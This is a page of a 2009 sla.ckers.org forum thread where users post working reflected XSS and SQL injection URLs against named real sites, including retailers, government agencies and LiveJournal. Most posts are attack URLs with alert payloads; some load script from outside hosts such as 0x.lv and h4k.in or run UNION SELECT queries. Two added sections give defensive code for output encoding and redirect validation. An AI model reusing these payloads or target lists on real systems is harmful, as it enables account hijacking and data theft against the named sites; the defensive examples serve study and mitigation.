Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 60 of 65
Re: So it begins
Posted by: one23
Date: January 05, 2009 06:45PM

@PaPPy

Gr8 job dude !!!!

Re: So it begins
Posted by: t
Date: January 05, 2009 10:58PM

Was playing around with url=

hxxps://blackboard.uoregon.edu/webapps/login/?new_loc=">

It's neat, but I tried to escape so I could script but had no luck... Is it possible?

Re: So it begins
Posted by: thornmaker
Date: January 06, 2009 02:40AM

Yes, it's possible. Try an img/onerror injection with a backslash before each attribute.

Re: So it begins
Posted by: digi7al64
Date: January 09, 2009 12:44AM

t Wrote:
-------------------------------------------------------
> was playing around with url=
>
> hxxps://blackboard.uoregon.edu/webapps/login/?new_loc=">
>
> its neat, but i tried to escape so I could script but had no luck... is possible?

Blackboard has so many XSS (persistent and reflective) vulns in it it's not funny. We spent an afternoon on it one day and came back with about 20 different versions in different spots.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Spyware
Date: January 10, 2009 08:14AM

hxxp://cygwin.com/cgi-bin2/package-grep.cgi?grep=<script>alert(1)</script>

Re: So it begins
Posted by: chosi
Date: January 11, 2009 05:59AM

digi7al64 Wrote:
> blackboard has so many xss (persistent and
> reflective) vuns in it its not funny. We spent an
> afternoon on it one day and came back with about
> 20 different versions in different spots.

Yup. If you try three random parameters in a URL, at least two of them are vulnerable. Great for people new to XSS: it's _bound_ to happen ;)

Re: So it begins
Posted by: PaPPy
Date: January 11, 2009 01:09PM

http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=test%22%3E%29%3B%20document.write%28String.fromCharCode%2860%2C115%2C99%2C114%2C105%2C112%2C116%2C62%2C97%2C108%2C101%2C114%2C116%2C40%2C49%2C41%2C59%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29%3B%20//%26langId%3D-1%26storeId%3D10051%26catalogId%3D10053

http://www.homedepot.com/webapp/wcs/stores/servlet/THDStoreFinder?storeId=10051&URL=StoreFinderViewDetails&errorViewName=StoreFinderView&headerStoreFinder=&List=List&catalogId=10053&zip=%22%3B%20document.write%28String.fromCharCode%2860%2C115%2C99%2C114%2C105%2C112%2C116%2C62%2C97%2C108%2C101%2C114%2C116%2C40%2C49%2C41%2C59%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29%3B%20var%20blah%3D%22a%26distance_1%3D100%26city%3D%26state_1%3D%26distance_2%3D100%26store%3D

http://www.homedepot.com/webapp/wcs/stores/servlet/ContentView?storeId=10051&jspStoreDir=hdus&pn=SF_OD_Charbroil_Red_Grill_%27%29%3Bdocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,59,60,47,115,99,114,105,112,116,62));%0Adocument.write('a

https://careers.homedepot.com/cg/stores.do?city=%22></a><script>alert(1);</script>&stateAbbrev=IA&zip=&companyId=&storeNumbersHtml=&positionCodesHtml=&searchType=1&isKiosk=false

http://www.homedepot.ca/webapp/wcs/stores/servlet/CatalogSearchResultView?storeId=10051&catalogId=10051&langId=-15&N=0&Ntk=level1&Ntt=%22><img%20src=x%20onerror=%22alert(1)%22;>&Nty=1&D=%22><img%20src=x%20onerror=%22alert(1)%22;>&Ntx=mode+matchallpartial&Dx=mode+matchallpartial&s=true

http://www.expo.com/searchresults.aspx?searchterm=</title>';%20</script><script>alert(1);</script>

http://www.kmart.com/shc/s/s_10151_10104_Bed+%26+Bath_Bedding_Pillows--%3E%3Cimg%20src=x%20onerror=%22alert(1);%22%3E#viewItems=21&pageNum=1&sortOption=SALE_HIGH_TO_LOW&&filter=Brand%7CCannon%7CEssential+Home%7CJoe+Boxer%22%3E%3C/a%3Etest%7CAbbey+Hill&lastFilter=Brand?adCell=A2

I need some help with this one
http://www.homedecorators.com/search.php?search=%22%3E%2526lt%26lt%3B%2Fa%26gt%3Bmarquee%3Etest&x=0&y=0

http://www.xssed.com/archive/author=PaPPy/



Edited 7 time(s). Last edit at 01/11/2009 06:56PM by PaPPy.

Re: So it begins
Posted by: chosi
Date: January 12, 2009 09:29AM

PaPPy Wrote:
-------------------------------------------------------
> ...
> i need some help with this one
> http://www.homedecorators.com/search.php?search=%22%3E%2526lt%26lt%3B%2Fa%26gt%3Bmarquee%3Etest&x=0&y=0


How about http://www.homedecorators.com/searchTips.php?search=%22%3E/onmouseover=alert(1)// - only an event handler, though :)

Funny: NoScript says "possible XSS filtered" but it's still alerting when I mouseover the form. That's a bug, isn't it?! :o

Re: So it begins
Posted by: zabouteurezzz
Date: January 13, 2009 02:49AM

http://ranshop.e-games.com.ph/shop/desc.asp?prod_no=142205&type=new";<script>alert('xss')</script><"

-----------------------
"PiNoY AkO!"

Re: So it begins
Posted by: PaPPy
Date: January 14, 2009 03:48PM

http://shop3.frys.com/search?search_type=regular&sqxts=1&query_string=mouse_over_here%22%20onmouseover%3D%22document.location='http%26%2358//google.com';&cat=0&submit.x=0&submit.y=0

http://www.sears.com/shc/s/v_10153_12605_Health+testicles--><iframe%20src=%22http:/%0a/google.com%22>

Or a different version, same page but inside the JS; it took me some time to get to this solution:
http://www.sears.com/shc/s/v_10153_12605_Health+testicles%22;%20document.location=%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3A%5Cx2F%5Cx2F%5Cx67%5Cx6F%5Cx6F%5Cx67%5Cx6C%5Cx65%5Cx2E%5Cx63%5Cx6F%5Cx6D

Click on print:
http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=%27);%20alert(1);%20//&noBc=Click%20on%20print

http://www.tmz.com/search/?q=</title><script>alert(1);</script>test

http://www.xssed.com/archive/author=PaPPy/



Edited 4 time(s). Last edit at 01/14/2009 06:38PM by PaPPy.

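Added worked example (not from this thread, and not any of the sites' code): the payloads PaPPy and others are posting break out of three different reflection contexts, an HTML attribute (`"><img src=x onerror=...`), a JS string literal (`"; document.location="\x68..."`), and `<title>` (`</title><script>`). The script below models each context with a constructed template, runs the thread's payload shapes through plain concatenation, a quote-only escaper, and a context-matched encoder, and reports which ones still break out. The templates, payload strings and the regex breakout check are assumptions for illustration; the real pages' templates are not known.

```javascript
// Added example: context-aware output encoding versus the breakout payloads
// seen in this thread. Templates, payloads and the breakout check are
// constructed for illustration; nothing here is the real sites' code.

// One payload shape per reflection context, modelled on the URLs above.
const payloads = {
  // value lands inside a double-quoted HTML attribute
  attribute: '"><img src=x onerror="alert(1)">',
  // value lands inside a double-quoted JS string literal (hex-escaped URL, as in the Sears one)
  jsString: '"; document.location="\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x65\\x76\\x69\\x6c";',
  // value lands inside <title>, where only </title> ends the text
  title: '</title><script>alert(1);</script>test',
};

// Naive rendering: plain concatenation, which is what the vulnerable pages appear to do.
const naive = {
  attribute: (v) => `<input name="q" value="${v}">`,
  jsString: (v) => `<script>var q = "${v}";</script>`,
  title: (v) => `<title>Search: ${v}</title>`,
};

// Escaper that only handles the double quote: enough for a quoted attribute, nothing else.
const quoteOnly = (s) => s.replace(/"/g, '&quot;');

// Context-matched encoders.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function jsStringEncode(s) {
  // Everything outside [A-Za-z0-9] becomes \xHH or \uHHHH, so neither a quote
  // nor a "</script>" sequence can appear in the emitted literal.
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

const withQuoteOnly = {
  attribute: (v) => naive.attribute(quoteOnly(v)),
  jsString: (v) => naive.jsString(quoteOnly(v)),
  title: (v) => naive.title(quoteOnly(v)),
};
const withContextEncoding = {
  attribute: (v) => naive.attribute(htmlEncode(v)),
  jsString: (v) => naive.jsString(jsStringEncode(v)),
  title: (v) => naive.title(htmlEncode(v)),
};

// Heuristic breakout check (not an HTML parser): does the rendered text still
// contain the token that ends the intended context early?
const breakout = {
  attribute: /"\s*>\s*<img/i,           // closed the attribute value and opened a tag
  jsString: /";\s*document\.location/,  // closed the string literal and ran a statement
  title: /<\/title\s*>\s*<script/i,     // closed <title> and opened <script>
};

// Returns { attribute: bool, jsString: bool, title: bool }; true means the
// payload broke out of that context under the given set of templates.
function evaluate(templates) {
  const out = {};
  for (const ctx of Object.keys(payloads)) {
    out[ctx] = breakout[ctx].test(templates[ctx](payloads[ctx]));
  }
  return out;
}

// Stand-alone run: naive fails everywhere, quote-only fails in <title>,
// context-matched encoding holds in all three.
console.log({
  naive: evaluate(naive),
  quoteOnly: evaluate(withQuoteOnly),
  encoded: evaluate(withContextEncoding),
});
```

The quote-only escaper is the interesting row: it stops the attribute and JS-string payloads (an entity inside `<script>` is never decoded, so the string literal stays intact, at the cost of mangled data) but does nothing for `<title>`, which is why the `</title><script>` trick keeps working on sites that escape quotes and think they are done.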
Re: So it begins
Posted by: PaPPy
Date: January 16, 2009 06:36PM

This deserves its own post:
http://www.nsa.gov/applications/ia/events/open_index.cfm?menutype=openreg%22;%20alert(1);%20var%20blah=%221
http://www.nsa.gov/applications/ia/events/conferences/index.cfm?ConferenceID=58&menutype=openreg%22;%20alert(1);%20var%20blah=%221
http://www.nsa.gov/applications/ia/events/closed_index.cfm?menutype=closedreg%22;%20alert(1);%20var%20blah=%221
http://www.nsa.gov/applications/ia/events/scheduled_index.cfm?menutype=scheduled%22;%20alert(1);%20var%20blah=%221
http://csc-webserver.caci.com/nsa/new/email_friend.asp?refer_url=%22><script>alert(1);</script>
https://www.cia.gov/search?NS-search-offset=483&NS-query=%27;%20%0A%7D%20%0A%20alert(1);%20%0A%20function%20makeGuidedSearchApplet2()%7B%0A%20str+=%27&NS-search-type=NS-boolean-query&NS-max-records=20&NS-collection=Everything&x=0&y=0&NS-search-page=results&

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 01/16/2009 06:54PM by PaPPy.

Re: So it begins
Posted by: tx
Date: January 26, 2009 04:57PM

Hi livejournal, both fire upon logging in.

The obvious: http://www.livejournal.com/?returnto=javascript:alert(document.domain)

The not so obvious: http://www.livejournal.com/?returnto=%0A%0D%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3E%3CHTML%3E%3CHEAD%3E%3CTITLE%3E%3C/TITLE%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C/HEAD%3E%3CBODY%3E%3C![

btw, ++ to livejournal for HttpOnly cookies, though!

EDIT: Regarding HttpOnly cookies, I thought about trying to set/modify them via response splitting, but I couldn't really get it to work.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/26/2009 04:58PM by tx.

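Added example, not LiveJournal's code: one way a login handler could validate a `returnto` parameter so that neither the `javascript:` URI nor the CRLF-led payload from the post above survives. It assumes the value is percent-decoded exactly once, must be an absolute path on the site's own origin, and is rejected outright on control characters (which is what matters if the value ends up in a Location header, the response-splitting case mentioned in the EDIT). The origin `https://www.livejournal.com`, the fallback `/`, and the sample inputs are assumptions.

```javascript
// Added example, not LiveJournal's code: validating a post-login returnto
// parameter. Origin and fallback below are assumptions.
const SITE_ORIGIN = 'https://www.livejournal.com';

// Decode exactly once; malformed percent-encoding is treated as invalid.
function decodeOnce(raw) {
  try {
    return decodeURIComponent(raw);
  } catch {
    return null;
  }
}

// Returns a same-origin path to redirect to, or the fallback if the value is
// anything else: a scheme such as javascript:, a protocol-relative //host,
// a backslash variant, or control characters that could split an HTTP response.
function safeReturnTo(raw, fallback = '/') {
  if (typeof raw !== 'string') return fallback;
  const value = decodeOnce(raw);
  if (value === null) return fallback;
  // CR, LF and other C0/DEL controls: reject rather than strip, so a value
  // destined for a Location header cannot inject extra header lines.
  if (/[\u0000-\u001f\u007f]/.test(value)) return fallback;
  // Must be an absolute path on this origin: a single leading slash, not
  // followed by another slash or a backslash (browsers treat "/\host" like "//host").
  if (!/^\/(?![\/\\])/.test(value)) return fallback;
  // Let the URL parser confirm the resolved target is still our origin.
  const target = new URL(value, SITE_ORIGIN);
  if (target.origin !== SITE_ORIGIN) return fallback;
  return target.pathname + target.search + target.hash;
}

// Stand-alone run over the two payload shapes from the post plus an open
// redirect attempt and a benign value (constructed inputs).
for (const raw of [
  'javascript:alert(document.domain)',
  '%0A%0D%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3E',
  '//evil.example/',
  '/inbox/?page=2',
]) {
  console.log(JSON.stringify(raw), '->', safeReturnTo(raw));
}
```

Rejecting instead of sanitising is deliberate: stripping CR/LF or the `javascript:` prefix invites the next bypass (double encoding, `java%09script:`), whereas an allow-list of "absolute path on my origin" has nothing to bypass. Note that this only covers the redirect/link use of `returnto`; if the value is also echoed into the page body, it still needs the context-appropriate output encoding on top.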
Re: So it begins
Posted by: euronymous
Date: March 10, 2009 09:13AM

As always, lack of Java exception trace HTML escaping...

http://antisnatchor.com/2009/03/10/riotfamily-release-80-xss/

+++eat, fuck, hack+++

Re: So it begins
Posted by: Anonymous User
Date: March 14, 2009 12:29PM

http://herhotspot.com/search/hhs/%22%27%22%3E%3Cscript%3Ealert(%22hey%20ladies!%22)%3C/script%3E

Real XSS. Not sugar coated.

Re: So it begins
Posted by: nEUrOO
Date: March 17, 2009 06:30PM

@mario: Funnier than the XSS: why did you go on that website? :)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: So it begins
Posted by: thrill
Date: March 17, 2009 06:39PM

@nEUrOO - umm.. he was doing "research"? ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: So it begins
Posted by: flam
Date: March 17, 2009 08:12PM

http://rouxbe.com/recipes/video/search
"><script>alert('XSS')</script>


I don't see what a person can do by XSSing a search :/ Does anyone care to enlighten me please?

Re: So it begins
Posted by: Anonymous User
Date: March 18, 2009 01:17PM

@thrill && nEUrOO: Yep. Research. For good. Really :)

Re: So it begins
Posted by: Kyo
Date: March 21, 2009 05:21AM

That one is actually one of those sites that has XSS literally on every page

http://herhotspot.com/node/2224/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Re: So it begins
Posted by: nEUrOO
Date: March 22, 2009 09:08PM

LivingSocial: http://iphoneapps.livingsocial.com/search?q=%3C%2Ftitle%3E%3Cbody%20onload%3Dalert(%2Fpwn%2F)%3E

Interesting that this website has tons of Facebook apps :)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: So it begins
Posted by: Kyo
Date: March 24, 2009 10:26AM

bored

http://www.turkishculturalfoundation.org/pages.php?ID=-31%27%20UNION%20SELECT%20@@version--%20-

Re: So it begins
Posted by: PaPPy
Date: March 25, 2009 05:21PM

Thought this was for XSS?

http://www.xssed.com/archive/author=PaPPy/

Re: So it begins
Posted by: Kyo
Date: March 25, 2009 05:57PM

Full disclosure is full disclosure, right?

But if you insist...
http://www.turkishculturalfoundation.org/pages.php?ID=-31%27%20UNION%20SELECT%20CHAR(34,39,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,88,83,83,39,41,60,47,115,99,114,105,112,116,62)--%20-

Re: So it begins
Posted by: Anonymous User
Date: March 27, 2009 06:51AM

http://travel.travel/index.php/photos/?album=1&gallery=</title><script%20src=http://0x.lv></script>43

:)

Re: So it begins
Posted by: lightos
Date: March 27, 2009 12:45PM

http://www.pcworld.com/shopping/detail/prtprdid,62468597-sortby,retailer/pricing.html?zip=%22%3E%3Cscript%3Ealert(0)%3C%2Fscript%3E

http://store.officedepot.com.mx/OnlineStore/BrowseBrandID.do?brand=PORTMAN&name=xss<script>alert(0)</script>



Edited 2 time(s). Last edit at 05/28/2009 07:57AM by lightos.

Re: So it begins
Posted by: Anonymous User
Date: March 28, 2009 01:42PM

Hell's bells

http://www.vaticanlibrary.va/home.php?pag=sc_dirett%22%3E%3Cscript%20src=http://h4k.in%3E%3C/script%3Eore

Re: So it begins
Posted by: PaPPy
Date: April 01, 2009 02:34PM

http://ratethepink.com/comments.php?poster_id=78'<iframe%20src=//google.com
maybe someone could show me some way to exploit this sql injection?

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 04/01/2009 04:26PM by PaPPy.

Re: So it begins
Posted by: Spyware
Date: April 02, 2009 08:25AM

http://coderaptors.com/?<script>alert(1)</script>

They have cool Java Applets which demonstrate various sorting algorithms on this site, which almost makes up for this vulnerability. Almost.

Re: So it begins
Posted by: SpoofGhost
Date: April 06, 2009 12:54PM

Haha, I also got a nice one:

rootx.nl

Oh well, you get my point xD



Edited 1 time(s). Last edit at 04/06/2009 12:55PM by SpoofGhost.

Re: So it begins
Posted by: Kyo
Date: April 15, 2009 01:33PM

http://www.irintech.com/x1/blogarchive.php?id=480/*sql injection here*/

Oh, the irony.
